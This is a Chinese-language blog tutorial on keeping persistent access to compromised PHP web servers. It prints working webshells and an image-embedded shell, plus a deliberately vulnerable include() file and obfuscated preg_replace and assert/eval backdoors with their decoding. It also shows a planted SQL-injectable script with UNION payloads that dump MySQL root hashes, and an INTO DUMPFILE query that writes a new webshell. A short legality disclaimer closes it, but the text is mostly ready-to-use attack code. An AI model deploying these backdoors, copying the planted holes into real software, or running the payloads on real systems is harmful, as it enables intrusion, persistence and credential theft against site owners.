web端权限维持【好文】
前言
关于权限维持,我之前写过一篇基于系统端的后门技术文章,如映像劫持啊,lpk之类。
内容目录:
- 构造文件包含漏洞
- 隐蔽性脚本木马
- 构造sql注入点
正文
0x01 构造文件包含漏洞
>**本部分概览:**
> * 基本的文件包含姿势
> * 制作图片马
> * 构造文件包含漏洞
- **PHP文件包含漏洞介绍**
首先,我们来介绍下何为文件包含漏洞。严格来说,文件包含漏洞是`代码注入`的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。`代码注入`的典型代表就是文件包含。文件包含漏洞可能出现在`JSP、PHP、ASP`等语言中,原理都是一样的,本实验以PHP文件包含漏洞做例子。
要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件:
> 1. Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件;
> 2. 用户能够控制该动态变量。
在PHP中,有四个用于包含文件的函数,当使用这些函数包含文件时,文件中包含的PHP代码会被执行。下面对它们之间的区别进行解释:
>`include()`:当使用该函数包含文件时,只有代码执行到`include()`函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。
>`include_once()`:功能和`include()`相同,区别在于当重复调用同一文件时,程序只调用一次。
>`require()`:`require()`与`include()`的区别在于`require()`执行如果发生错误,函数会输出错误信息,并终止脚本的运行。使用`require()`函数包含文件时,只要程序一执行,立即调用文件,而include()只有程序执行到该函数时才调用。
>`require_once()`:它的功能与`require()`相同,区别在于当重复调用同一文件时,程序只调用一次。
#### 步骤1 基本的文件包含姿势
以下所有步骤建立在已经取得目标机权限的情况下。
我们假设事先通过一系列的渗透测试得到了目标机的一句话webshell。
假设我们事前得知,目标服务器的一些脚本文件存在文件包含漏洞,如:
/clude.php?file=index.php
其参数`file`没有作很好的过滤,可以包含任意文件。
比如,我们在漏洞文件`clude.php`同目录新建一个文件`getshell.php`,内容是PHP一句话木马:
<?php @eval($_POST['pass']);?>
使用中国菜刀进入文件管理功能并如下操作:
那么我们尝试通过`clude.php`包含脚本木马`getshell.php`:
/clude.php?file=getshell.php
点击`Enable Post data`调出POST数据栏,并POST以下数据:
pass=system('set');
此处传递的变量是通过调用PHP的`system()`函数执行`set`命令来查看当前系统的环境变量。
当然,这里直接包含了一个木马文件,在我们已经有了webshell的情况下,这好像并没有很大意义。隐蔽性并不是很强。
#### 步骤2 制作图片马
PHP文件包含,其包含的文件无论是什么格式,都会被当做PHP文件来解析。
那么,如果恶意代码被插入到了一个正常的网页图片中,而且图片在被插入恶意代码之后还能正常显示,那隐蔽性就增强了。
图片木马其实还有另一点意义,有些网站我们在渗透测试尝试上传shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传`.asp .php`结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会把一句话放在图片里面,写成`1.asp;.jpg或1.asp;jpg`的格式上传上去,这样上传的时候系统检测是图片,然后在上传之后,会把这个文件当asp文件来处理。
那么如何用制作图片形式的一句话木马呢?
首先我们在工具目录准备了一个图片文件`1.png`,和一个一句话木马文件`hack.php`。
准备好之后就在该目录开启命令行,然后输入以下命令:
copy 1.png/b+hack.php test.png
然后回车就系统就会自动把这两个文件组合起来并命名为`test.png`:
这个时候我们打开两个文件对比一下,用记事本打开,发现`1.png`的内容当中已经把我们的`hack.php`的一句话木马语句已经加加到图片当中去了。
当然了,最重要的是,被写入了一句话的图片还是可以正常打开的,此为本步骤的目的所在:
那么,在实际渗透测试实验中,我们通常是通过下载网站原有的图片文件并替换成一句话木马最后通过替换原本的图片文件达到一定的隐蔽效果。
那么我们试试该图片木马是否可用,先通过中国菜刀的文件上传功能把`test.png`上传到目标机根目录:
那么我们尝试通过`clude.php`包含一句话图片木马`test.png`:
/clude.php?file=test.png
点击`Enable Post data`调出POST数据栏,并POST以下数据:
pass=system('set');
此处传递的变量是通过调用PHP的`system()`函数执行`set`命令来查看当前系统的环境变量。
当然,这里还是直接包含了一个木马文件,在我们已经有了webshell的情况下,这好像并没有很大意义。隐蔽性并不是很强。
#### 步骤3 构造文件包含漏洞
那么假设我们拿到shell的服务器上的脚本文件都不存在文件包含漏洞就需要我们自己来构造漏洞了,以达到权限维持的效果。
文件包含漏洞的脚本文件的构造就比较简单了,直接写一个不带有任何过滤的利用`include()`函数调用文件的PHP文件,文件代码及相关的注释如下:
<?php
$filename=$_GET['filename']; //将参数file的值传递给$filename变量
include($filename); //使用include()函数包含文件
?>
上述代码我们已经保存在工具目录的`include.php`,我们使用中国菜刀的文件管理功能把`include.php`上传到目标站根目录:
接下来我们在浏览器访问以下URL以包含图片木马`test.png`:
http://172.16.12.2/include.php?filename=test.png
此处的PNG文件被当做是PHP文件解析,于是直接显示了图片乱码,我们在乱码最后并没有发现我们的一句话木马痕迹,于是推断我们的一句话木马已经被解析。
接着我们点击`Enable Post data`调出POST数据栏,并POST以下数据:
pass=system('net user');
此处传递的变量是通过调用PHP的`system()`函数执行`set`命令来查看当前系统的环境变量。
我们在图片乱码下面可以看到`net user`命令的回显。
至此,图片木马被成功部署并利用。
0x02 隐蔽性脚本木马
>**本部分概览:**
> * 使用`preg_replace`函数留后门
> * 使用加密`preg_replace`函数
> * 变异加密型后门
#### 步骤1 使用`preg_replace`函数留后门
其实我们可以通过如下代码实现了隐藏式后门:
<?php @preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");?>
乍看到这个代码觉得没什么问题,这里用到的是php的`preg_replace`函数:
- `preg_replace`函数原型:
mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
特别说明:
`/e`修正符使`preg_replace()`将`replacement`参数当作 PHP代码(在适当的逆向引用替换完之后)。
提示:要确保`replacement`构成一个合法的 PHP 代码字符串,否则 PHP 会在报告:在"包含 `preg_replace()` 的行中出现语法解析错误."
上面的代码是POST接收数据,实现可能不太直观,如果换成GET获取数据的话可以更好地理解:
举例,代码如下:
<?php echo preg_replace("/test/e",$_GET["h"],"jutst test");?>
我们假设事先通过一系列的渗透测试得到了目标机的一句话webshell。
在中国菜刀的文件管理页面右键,新建一个`test.php`,内容是上述的`get`方式提交的一句话:
<?php echo preg_replace("/test/e",$_GET["h"],"jutst test");?>
如果我们提交`?h=phpinfo()`即是通过传参执行了PHP的`phpinfo()`函数。
即在浏览器访问以下URL传递需要执行的变量函数`phpinfo()`:
/test.php?h=phpinfo();
如上图可见`phpinfo()`将会被执行(用`/e`修饰符,`preg_replace`会将`replacement`参数当作PHP代码执行)。
在PHP中,双引号里面如果包含有变量,php解释器会将其替换为变量解释后的结果,单引号中的变量不会被处理。
**注意:**双引号中的函数不会被执行和替换。
#### 步骤2 使用加密`preg_replace`函数
我们准备了一个加密`preg_replace`函数的一个php后门文件:
文件内容如下:
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
<?php $MMIC = $_GET [ 'tid' ]? $_GET [ 'tid' ]: $_GET [ 'fid' ]; if ( $MMIC >1000000){ die ( '404' ); } if (isset( $_POST [ "\x70\x61\x73\x73" ]) && isset( $_POST [ "\x63\x68\x65\x63\x6b" ])) { $__PHP_debug = array ( 'ZendName' => '70,61,73,73' , 'ZendPort' => '63,68,65,63,6b' , 'ZendSalt' => '202cb962ac59075b964b07152d234b70' //792e19812fafd57c7ac150af768d95ce ); $__PHP_replace = array ( pack( 'H*' , join( '' , explode ( ',' , $__PHP_debug [ 'ZendName' ]))), pack( 'H*' , join( '' , explode ( ',' , $__PHP_debug [ 'ZendPort' ]))), $__PHP_debug [ 'ZendSalt' ] ); $__PHP_request = & $_POST ; $__PHP_token = md5( $__PHP_request [ $__PHP_replace [0]]); if ( $__PHP_token == $__PHP_replace [2]) { $__PHP_token = preg_replace ( chr (47). $__PHP_token . chr (47). chr (101), $__PHP_request [ $__PHP_replace [1]], $__PHP_token ); unset ( $__PHP_debug , $__PHP_replace , $__PHP_request , $__PHP_token ); if (!defined( '_DEBUG_TOKEN' )) exit ( 'Get token fail!' ); } } |
上述代码最后解密出来其实还是利用`preg_replace`的`/e`来执行的一句话webshell。
代码中的md5值`202cb962ac59075b964b07152d234b70`明文是`123`。
我们先通过上个步骤中的一句话木马把`test1.php`上传到目标机根目录,
该木马的利用方式是访问该文件并通过POST方式提交类似如下数据:
pass=123&check=phpinfo();
那么我们在浏览器POST数据一般是通过火狐浏览器的hackbar插件,
火狐浏览器的的Hackbar插件的POST数据栏默认是不开启的,我们需要勾选上图红圈中的部分已启动POST栏。
启动POST栏之后,我们在`Post data`一栏输入以下数据来POST给服务器:
pass=123&check=phpinfo();
上述POST的数据是尝试执行`phpinfo()`函数:
如上图可见,`phpinfo()`函数被成功执行。
当然我们还能通过`system()`函数来执行系统命令:
如通过火狐浏览器的Hackbar插件POST以下数据:
pass=123&check=system('set')
上述POST的数据中就是执行了系统命令`set`查看当前操作系统环境变量,如上图,我们成功取得了返回。
#### 步骤3 变异加密型后门
我们这里准备了一个PHP脚本后门,代码很是奇葩,源代码如下:
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
<?php function cve( $str , $key ) { $t = "" ; for ( $i =0; $i < strlen ( $str ); $i = $i +2) { $k =(( $i +2)/2)% strlen ( $key ); $p = substr ( $key , $k ,1); if ( is_numeric ( substr ( $str , $i ,1))) { $t = $t . chr (hexdec( substr ( $str , $i ,2))- $p ); } else { $t = $t . chr (hexdec( substr ( $str , $i ,4))); $i = $i +2; } } return ( $t ); } (@ $_ =cve( '6A767C687B77' , '39' )).@ $_ (cve( '6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E' , '520' )); ?> |
上述源码,光看看你是看不出什么端倪的。我们为了方便大家看到上述代码到底做了些什么,对代码做了输出调试处理,输出每个步骤的输出,并对代码做了一些详细的解释:
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
<?php function cve( $str , $key ) { $t = "" ; echo $str . ">>" . $key . "" ; for ( $i =0; $i < strlen ( $str ); $i = $i +2) { echo $i . " while " ; //这里是循环次数 $k =(( $i +2)/2)% strlen ( $key ); echo " ---- " . $k ; //这里经过上面算法处理后的,本次(i+2/2)%(字符串长度) $p = substr ( $key , $k ,1); //取key变量从$k开始,返回1个字符 echo " ---- " . $p ; // if ( is_numeric ( substr ( $str , $i ,1))) //如果$str字符串在$i的位置返回是数字的话 { $t = $t . chr (hexdec( substr ( $str , $i ,2))- $p ); echo $t . " >>>>>>yes int" . "" ; //$str字符串在$i位置开始返回2个字符转化为10进制数字,然后减去上面的$p,用chr返回对应的ASCII码值 } else { $t = $t . chr (hexdec( substr ( $str , $i ,4))); $i = $i +2; echo $t . " >>>>>>is no int" . "" ; //如果if判断的不是数字的话走这里,这里和上面一样区别是从$i位置开始返回4个字符并给$i+2,走到这个流程的话每次是4 } } echo $t . " >>>>>>return>>>>>>" . $t . "" ; return ( $t ); } (@ $_ =cve( '6A767C687B77' , '39' )).@ $_ (cve( '6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E' , '520' )); //(@$_=assert).@$_(eval(base64_decode($_POST['z0']))); //第一次解密 //assert(eval(base64_decode($_POST['z0']))); //第二次解密 //发现是base64编码的变形马 echo "" . base64_encode ( "phpinfo();" ). "" ; //cGhwaW5mbygpOw== //只要post发请求 z0=cGhwaW5mbygpOw== 即可使用了这个木马了 //不过这个木马觉的使用者应该会用跳板去中转base64编码,这样一个达到了跳板隐藏的作用,另一个用base64编码绕过waf ?> |
做了调试的的源码我们命名为`base1.php`:
接着我们使用中国菜刀把上述两个文件`base.php`和`base1.php`都上传到网站根目录。
好了之后我们访问已经做了调试的`base1.php`:
```
http://172.16.12.2/base1.php
```
如上图可见,php文件运行起来后输出结果如下:
上述代码文件我们是一步一步输出的,输出到最后,我们发现,生成的竟然是经典的PHP版一句话木马文件代码:
eval(base64_decode($_POST[‘z0’]))
上述一句话木马文件中在POST数据外加了`base64_decode`函数,于是我们需要对变量的提交做`base64`加密处理。
`base.php`上传之后具体的URL地址如下:
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
6 A 767 C 687 B 77 > > 39 0 while — - 1 — - 9 a > > > > > > yes int 2 while — - 0 — - 3 as > > > > > > yes int 4 while — - 1 — - 9 ass > > > > > > yes int 6 while — - 0 — - 3 asse > > > > > > yes int 8 while — - 1 — - 9 asser > > > > > > yes int 10 while — - 0 — - 3 assert > > > > > > yes int assert > > > > > > return > > > > > > assert 6776666 E 286763736 A 38346466656871646 A 2 A 2464524 F 58565 B 2 C 7 C 302 C 5 F 292 E > > 520 0 while — - 1 — - 2 e > > > > > > yes int 2 while — - 2 — - 0 ev > > > > > > yes int 4 while — - 0 — - 5 eva > > > > > > yes int 6 while — - 1 — - 2 eval > > > > > > yes int 8 while — - 2 — - 0 eval ( > > > > > > yes int 10 while — - 0 — - 5 eval ( b > > > > > > yes int 12 while — - 1 — - 2 eval ( ba > > > > > > yes int 14 while — - 2 — - 0 eval ( bas > > > > > > yes int 16 while — - 0 — - 5 eval ( base > > > > > > yes int 18 while — - 1 — - 2 eval ( base 6 > > > > > > yes int 20 while — - 2 — - 0 eval ( base 64 > > > > > > yes int 22 while — - 0 — - 5 eval ( base 64 _ > > > > > > yes int 24 while — - 1 — - 2 eval ( base 64 _d > > > > > > yes int 26 while — - 2 — - 0 eval ( base 64 _de > > > > > > yes int 28 while — - 0 — - 5 eval ( base 64 _dec > > > > > > yes int 30 while — - 1 — - 2 eval ( base 64 _deco > > > > > > yes int 32 while — - 2 — - 0 eval ( base 64 _decod > > > > > > yes int 34 while — - 0 — - 5 eval ( base 64 _decode > > > > > > yes int 36 while — - 1 — - 2 eval ( base 64 _decode ( > > > > > > yes int 38 while — - 2 — - 0 eval ( base 64 _decode ( $ > > > > > > yes int 40 while — - 0 — - 5 eval ( base 64 _decode ( $_ > > > > > > yes int 42 while — - 1 — - 2 eval ( base 64 _decode ( $_P > > > > > > yes int 44 while — - 2 — - 0 eval ( base 64 _decode ( $_PO > > > > > > yes int 46 while — - 0 — - 5 eval ( base 64 _decode ( $_POS > > > > > > yes int 48 while — - 1 — - 2 eval ( base 64 _decode ( $_POST > > > > > > yes int 50 while — - 2 — - 0 eval ( base 64 _decode ( $_POST[ > > > > > > yes int 52 while — - 0 — - 5 eval ( base 64 _decode ( $_POST[‘ > > > > > > yes int 54 while — - 1 — - 2 eval ( base 64 _decode ( $_POST[‘z > > > > > > yes int 56 while — - 2 — - 0 eval ( base 64 _decode ( $_POST[‘z 0 > > > > > > yes int 58 while — - 0 — - 5 eval ( base 64 _decode ( $_POST[‘z 0 ’ > > > > > > yes int 60 while — - 1 — - 2 eval ( base 64 _decode ( $_POST[‘z 0 ’] > > > > > > yes int 62 while — - 2 — - 0 eval ( base 64 _decode ( $_POST[‘z 0 ’] ) > > > > > > yes int 64 while — - 0 — - 5 eval ( base 64 _decode ( $_POST[‘z 0 ’] ) ) > > > > > > yes int eval ( base 64 _decode ( $_POST[‘z 0 ’] ) ) > > > > > > return > > > > > > eval ( base 64 _decode ( $_POST[‘z 0 ’] ) ) |
我们在火狐浏览器访问该文件,并使用Hackbar插件直接提交下面的数据是不行的:
```
z0=phpinfo();
```
我们需要把对`z0`变量的赋值进行加密,加密后的数据形式如下:
```
z0=cGhwaW5mbygpOw==
```
我们直接选中`z0=phpinfo();`中的`phpinfo();`,然后点击`Encoding`->`Base64 Encoding`,如此`phpinfo();`将会被加密:
加密完成后,我们点击`Execute`提交:
如上图,`phpinfo()`函数被成功执行。
那么我们也可以尝试执行系统命令如`net user`:
常规来说,我们提交的是如下数据:
```
z0=system('net user');
```
在这里我们就需要对变量的赋值`system('net user');`部分进行加密,选中POST栏的`phpinfo();`,然后点击`Encoding`->`Base64 Encoding`,然后POST的数据变成如下形式:
```
z0=c3lzdGVtKCd2ZXInKTs=
```
加密完成后,我们点击`Execute`提交:
如上图可见,`net user`命令被成功执行而且我们获得了清晰地返回信息。
0x03 构造sql注入点
>**本部分概览:**
> * 构造注入点
> * 利用构造的注入点
本部分以php脚本和MySQL数据库为例,演示在获得目标机权限之后,在目标机上面构造一个注入漏洞方便我们后续隐蔽性维持权限的方法。
#### 步骤1 构造注入点
我们假设事先通过一系列的渗透测试得到了目标机的一句话webshell。
打开中国菜刀工具添加一句话木马,注意数据库配置信息填写如下数据(事先获得):
<T>MYSQL</T>
<H>localhost</H>
<U>root</U>
<哈哈>root</P>
<N>mysql</N>
使用中国菜刀进入到目标机的数据库管理功能:
在中国菜刀的数据库管理功能页面执行以下语句以创建一个新的数据库:
```
create database sqlinject;
```
然后退出该数据库管理页面,在重新进入数据库管理页面就能看到新建的数据库`sqlinjec`了,我们双击该数据库名切换到该数据库:
然后执行以下语句在`sqlinject`数据库中建立表和列:
```
create table admin(id int auto_increment primary key,username varchar(32) not null,password varchar(32) not null);
```
再执行以下语句想表中的列写入字段值:
```
insert into admin (username,password) values ('admin',md5('admin')),('safe',md5('12345')),('test',md5('test'));
```
然后我们双击查看`inject`数据库下各项,可以看到数据已经写入。
接下来我们需要构造脚本文件调用上述数据库,脚本文件内容如下:
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
|
<?php $db_host = 'localhost' ; $db_user = 'root' ; $db_pass = 'root' ; $id = $_REQUEST [ 'id' ]; $link = mysql_connect( $db_host , $db_user , $db_pass ) or die ( "DB Connect Error:" . mysql_error()); mysql_select_db( 'sqlinject' , $link ) or die ( "Can\'t use sqlinject:" . mysql_error()); $sql = "SELECT * FROM admin WHERE id=$id" ; $query = mysql_query( $sql ) or die ( "Invalid Query:" . mysql_error()); while ( $row = mysql_fetch_array( $query )) { echo "用户ID:" . $row [ 'id' ] . "<br>" ; echo "用户账号:" . $row [ 'username' ] . "<br>" ; echo "用户密码:" . $row [ 'password' ] . "<br>" ; } mysql_close( $link ); echo "当前查询语句:" . $sql . "<br>" ; ?> |
该文件上传完毕后,我们根据上述脚本内容推测,构造的sql注入点如下:
/test.php?id=1
#### 步骤2 利用构造的注入点
根据我们之前讲的sql注入相关知识,我们尝试通过构造以下语句读取数据库用户相关信息:
test.php?id=-1 union select concat(host,0x7c,user,0x7c,password),2,3 from mysql.user where host = 'localhost'#
>我们把参数从1改为-1是为了防止当前查询的返回结果影响我们到时候提取指定文本。
>`concat()`函数把多个需要查询的字段放在一起
>`0x7c`是`|`符号的16进制转码结果,有利于我们到时候把字段区分开。
我们得到以下具体信息:
localhost|root|*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
如此得知本地主机`localhost`的`root`账户的密码hash是`*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B`。
实际渗透测试中,我们可以通过`cmd5.com`的大型hash破解平台来破解密码,我们这里通过线上破解得知,此hash对应的密码值为`root`。这些信息可以用来后续的mysql提权。
后来假设我们之前的一句话木马被管理员删除了,然而我们还是可以利用上述我们创建的sql注入点向服务器再写入一个脚本木马。
然后我们尝试在这里写一个一句话webshell到服务器,一句话木马样本如下:
<?php @eval($_POST['pass']);?>
我们在火狐浏览器的HackBar插件把上述一句话木马转换为16进制,目的是避免特殊字符的转义导致语句不能正确执行:
如图,一句话木马加密后的结果为:
3c3f70687020406576616c28245f504f53545b2770617373275d293b3f3e
然后在注入点构造以下语句把一句话导出到`c:/www/small.php`,我们在一句话木马的16进制字符前加了`0x`(此为16进制标识符):
/ test.php? id = -1 union select 0 x 3 c 3 f 70687020406576616 c 28245 f 504 f 53545 b 2770617373275 d 293 b 3 f 3 e , 2 , 3 into dumpfile 'c : / www / small.php' |
以上语句连续执行两次,如果出现以下错误,即说明文件写入成功:
Invalid Query:File 'c:/www/small.php' already exists
//第二次写入提示文件已存在则说明文件写入成功
我们尝试使用中国菜刀连接一句话木马,如下图操作:
至此,我们成功够早了sql注入点并成功利用其向目标机写入了新的webshell。
分析与总结
本部分我们主要学习了以下内容:
- - 隐蔽性脚本木马
- - 畸形目录隐藏shell
- - 构造文件包含漏洞
- - 构造sql注入点
通过本实验,我们学习了几种比较奇特的隐蔽性的脚本木马的原理和利用方式,目的在于维持web端的权限。还学习了基本的文件包含漏洞的利用、图片木马的制作,以及如何构造文件包含漏洞以便我们后续维持web端权限、在目标服务器web端构造sql注入点用以后续维持权限的方式。
当然,web端权限维持技术各种各样,不仅于此,只有你想不到,没有渗透测试人员做不到。
若涉及敏感操作,请在法律允许的范围内测试!
文中0x02的步骤3:变异加密型后门,之前参考t00ls某牛的文章做的记录,已找不到原文链接,故未附链接。
web端权限维持【好文】的更多相关文章
- Web端权限管理新增实用功能:批量增加操作,简单方便快速!
扩展了吉日嘎拉的Web端权限管理功能后,每次添加菜单倒没啥问题,毕竟菜单的数量有限,可是每增加一个模块.功能或者说权限控制点,就得针对各种常规操作,新增很多遍. 浪费时间,还容易出错.新增了一个字典表 ...
- 【web端权限维持】利用ADS隐藏webshell
0X01 前言 未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法. 0X02 利用ADS隐藏web ...
- 基于吉日嘎底层架构的Web端权限管理操作演示-日志管理
权限管理要实现的效果是对“ 谁”可以访问“什么内容”,可以进行“哪些操作” 一系列权限的精细化控制.衡量一个软件好坏的重要标准是:它的权限体系是否足够细致.是否可以立体勾勒出信息对象的访问控制.前面4 ...
- 基于吉日嘎底层架构的Web端权限管理操作演示-组织机构管理
软件是服务组织的系统,而任何组织一定会涉及到权限:所以权限控制是一个系统的核心基础,不管你做啥系统都逃不过:有人的地方就有江湖,有系统就有权限管理. 今天我们继续讲一下组织机构的管理: 新增.修改.锁 ...
- 基于吉日嘎底层架构的Web端权限管理操作演示-菜单模块管理
按照顺序,这一篇介绍菜单模块管理,主要演示如下操作: 新增.修改.锁定.解锁.删除.撤销删除 排序 角色成员管理 用户成员管理 导出菜单模块数据 也许你会问,你在这自吹自擂,你这个BS的权限管理有啥缺 ...
- 基于吉日嘎底层架构的Web端权限管理操作演示-角色管理
上一篇介绍了用户管理,这篇来介绍角色管理,这是权限管理的核心部分,因为我们的权限管理系统是基于角色的,有个高大上的英文名叫RBAC(Role Based Acccess Control). 下面的这段 ...
- 基于吉日嘎底层架构的Web端权限管理操作演示-用户管理
相信博客园的朋友对吉日嘎拉都不陌生,相信很多人也买了他的源码,应用于自己的项目. 但是你有没有过一个困惑? 那就是:没有一个基于网页的权限管理界面. 今天,这一切都不再是问题,我花了3年时间研究学习并 ...
- 基于吉日嘎底层架构的通用权限管理Web端UI更新:参考DTcms后台界面
经一周的研究学习,看了国内的H+.HUI等,国外的PaperDashboardPro.Make.Metronic BootStrap等,最终选定用一个轻量的,适合中国人的,来自DTcms的后台管理UI ...
- web端访问文件没有权限的问题
背景 : ftp的PHP项目中的某些文件没有写入的权限..系统报注意错误!!! 原因 : 一般情况下,web端访问网站一般使用的是WWW权限(有限制的权限组)去访问, 但是我们编程开发的时候, 有可能 ...
随机推荐
- [C#.Net]对WinForm应用程序的App.config的使用及加密
我们在写C#应用程序时,在工程文件中放置一个app.config,程序打包时,系统会将该配置文件自动编译为与程序集同名的.exe.config 文件.作用就是应用程序安装后,只需在安装目录中找到该文件 ...
- linux关机命令-shutdown
shutdown1.作用shutdown命令的作用是关闭计算机.root用户关机时,不管是否还有其他登录用户,都会关机:如果是非root用户关机,如果还有其他的登录用户,将会提示不能关机.2.格式sh ...
- hdu 5120 (求两圆相交的面积
题意:告诉你两个圆环,求圆环相交的面积. /* gyt Live up to every day */ #include<cstdio> #include<cmath> #in ...
- GUI的最终选择Tkinter模块练习篇
一.Canvas画布练习 1)简单的绘制图框 from tkinter import * # 构建一个窗口 tk = Tk() # 画布 canvas= Canvas(tk,width=,height ...
- [转]urllib模块urlretrieve方法
直接将远程数据下载到本地 info: urllib.urlretrieve(url[, filename[, reporthook[, data]]])参数说明:url:外部或者本地urlfilena ...
- Linux服务器上新增开放端口号
开放端口的方法: 方法一:命令行方式 1. 开放端口命令: /sbin/iptables -I INPUT -p tcp --dport 8080 -j ACCEPT ...
- 2018.12.15 bzoj3676: [Apio2014]回文串(后缀自动机)
传送门 对原串建立一个后缀自动机,然后用反串在上面匹配. 如果当前匹配的区间[l,r][l,r][l,r]包裹了当前状态的endposendposendpos中的最大值,那么[l,maxpos][l, ...
- Java 208 道面试题:Java 基础模块答案
目前市面上的面试题存在两大问题:第一,题目太旧好久没有更新了,还都停留在 2010 年之前的状态:第二,近几年 JDK 更新和发布都很快,Java 的用法也变了不少,加上 Java 技术栈也加入了很多 ...
- C++STL 迭代器
迭代器类别: 输入迭代器(只读迭代器).输出迭代器(只写迭代器).正向迭代器.双向迭代器.随机访问迭代器 逆向遍历 for(vector<int>::reverse_iterator ri ...
- HDU 2147 kiki's game (奇偶博弈)
题意:给定一个 n * m 的格子,从右上角(1, m) 开始每个玩家只能从向下,向左,或者向左下走,谁不能走,谁输. 析:自己做出来,看了网上的几个博客,好像都没说为什么是只有全奇的情况才会输,个人 ...